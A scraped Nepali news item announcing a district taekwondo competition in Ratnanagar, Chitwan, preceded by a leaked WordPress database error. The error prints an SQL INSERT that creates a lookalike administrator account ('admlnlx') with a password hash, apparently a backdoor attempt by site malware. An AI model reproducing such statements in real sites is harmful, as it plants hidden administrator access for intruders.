WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br.scTqdj8viGDemRPwc39wkZ1.R3n1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:30:18', '', 'admlnlx', 'admlnlx')
चितवन,माघ १२ –
यही माघ १४ र १५ गते रत्ननगरमा ५३ औं जिल्ला व्यापी तेक्वान्दो प्रतियोगिता हुने भएको छ । रत्ननगर तेक्वान्दो डोजाङ र रत्ननगर नगरपालिकाको सयुक्त आयोजनामा प्रतियोगिता हुन लागेको हो । प्रतियोगितामा जिल्लाभरका २२ वटा डोजाङका करिव २५० जना खेलाडीको सहभागीता रहने प्रतियोगिताका संयोजक एवंम् तेक्वान्दोका अन्तराष्ट्रिय निर्णायक पुष्पराज जोशीले जानकारी दिए । पुरुष ६ र महिला ७ तौल समुहमा प्रतिस्पर्धा हुनेछ । रत्ननगर ८ स्थित वैरिया माविमा हुने प्रतियोगितामा प्रथम ,द्धितिय र तृतिय हुने टिमलाई पुरस्कृत गरिने संयोजक जोशीले वताए । प्रतियोगितामा उत्कृष्ठ महिला र पुरुष खेलाडीलाई पनि पुरस्कृत गरिने छ ।